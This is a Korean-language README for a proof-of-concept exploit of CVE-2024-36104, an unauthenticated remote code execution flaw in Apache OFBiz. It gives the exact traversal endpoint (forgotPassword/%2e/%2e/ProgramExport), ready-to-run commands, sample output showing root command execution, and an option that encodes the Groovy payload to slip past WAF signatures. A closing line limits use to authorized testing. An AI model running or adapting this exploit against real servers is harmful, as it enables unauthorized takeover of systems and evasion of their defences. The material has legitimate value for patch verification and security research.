
CVE-2024-36104용 PoC — /%2e/%2e/ view 경로 탐색을 통해 ProgramExport에 접근하는 Apache OFBiz(<18.12.14)의 인증되지 않은 Groovy RCE
CVE-2024-36104에 대한 개념 증명(PoC)으로, Apache OFBiz 18.12.14 이전 버전의 인증되지 않은 원격 코드 실행 취약점입니다.
OFBiz의 ControlServlet은 요청 경로를 정규화하기 전에 인증되지 않은 뷰(forgotPassword)를 해석합니다. /%2e/%2e/를 추가하면 경로가 다시 /webtools/control/로 축소되므로, 요청은 원래 뷰와 연결된 보안/권한 검사를 전혀 거치지 않고 ProgramExport 뷰에 도달합니다. 이후 ProgramExport가 임의의 Groovy 코드를 실행하여 인증되지 않은 원격 명령 실행을 가능하게 합니다.
이 스크립트는 명령을 /usr/bin/bash -lc로 실행하는 Groovy 스니펫으로 감싼 뒤 취약한 엔드포인트로 전송하고, OFBiz가 HTML 응답에 포함해 다시 던지는 java.lang.Exception에서 출력을 추출합니다.
/%2e/%2e/ 경로 순회를 통해 forgotPassword에서 ProgramExport로 이어지는 경로를 구성합니다.groovyProgram으로 취약한 엔드포인트에 전송합니다.Python 3.8+
pip install -r requirements.txt
필요한 Python 패키지:
requests
urllib3
꺾쇠괄호(< >)로 감싼 값은 자리 표시자입니다. 이를 자신의 값으로 바꾸고 < 또는 > 문자는 포함하지 마세요.
python3 cve_2024_36104.py \
--target <TARGET_URL> \
--command <COMMAND>
<TARGET_URL> # Target base URL. Example: https://10.129.231.23
<COMMAND> # Command that Bash will interpret. Example: id
python3 cve_2024_36104.py \
--target https://10.129.231.23 \
--command "id"
예제 출력:
[2026-05-17T18:20:10Z] [*] Target: https://10.129.231.23/webtools/control/forgotPassword/%2e/%2e/ProgramExport
[2026-05-17T18:20:10Z] [*] Host header sent: localhost
[2026-05-17T18:20:10Z] [*] Command: id
[2026-05-17T18:20:11Z] [*] HTTP status: 200
[2026-05-17T18:20:11Z] [*] Response size: 4213 bytes
[+] Output of: id
uid=0(root) gid=0(root) groups=0(root)
-H, --host-header <HOST>
Value of the Host header. Default: localhost
--prefix-view <VIEW>
Unauthenticated view used before the /%2e/%2e/ traversal. Default: forgotPassword
--target-view <VIEW>
View reached after the traversal. Default: ProgramExport
--endpoint <PATH>
Full custom endpoint path, overrides --prefix-view/--target-view.
--timeout <SECONDS>
Maximum HTTP request time. Default: 15
--obfuscate
Send groovyProgram as \uXXXX escapes instead of plaintext, matching the
encoding used in public write-ups to dodge naive WAF signatures.
--show-payload
Print the generated Groovy code before sending it.
--show-response
Print the full HTML response.
--only-final
Hide progress logs and print only the command output.
--no-color
Disable ANSI colors.
--debug
Enable extra diagnostic logging.
502를 반환하면 프록시 시간 초과 전에 백엔드가 완료되지 않았을 가능성이 높습니다. 명령은 서버 측에서 여전히 완료될 수 있습니다.--show-response를 사용하여 원시 HTML을 확인하세요.이 PoC는 승인된 보안 테스트, 실험실 환경, 취약점 검증을 위해 제작되었습니다. 명시적 허가 없이 시스템에 사용하지 마십시오.